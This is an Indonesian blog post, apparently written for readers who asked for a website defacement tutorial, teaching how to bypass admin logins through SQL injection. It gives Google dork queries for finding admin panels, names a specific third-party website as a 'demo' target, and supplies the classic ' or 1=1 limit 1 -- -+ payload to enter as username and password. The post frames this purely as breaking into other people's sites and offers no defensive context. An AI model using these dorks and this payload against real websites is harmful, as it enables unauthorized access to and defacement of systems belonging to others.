Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?
Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"
Oke langsung saja kita masuk ke tutorialnya :
[#] Dork
[#] Langkah-langkahinurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini
http://preprojects.com/hostfriendz/int/index.php2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+
Simpel ya hhee dah cukup itu aja kok :D
Sekian tutorial dari saya thanks to Mr Xenophobic ^_^
untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk
Author : Bimo Septiawan
0 komentar:
Post a Comment
Jadilah orang yang memberikan komentar yang baik untuk semuanya!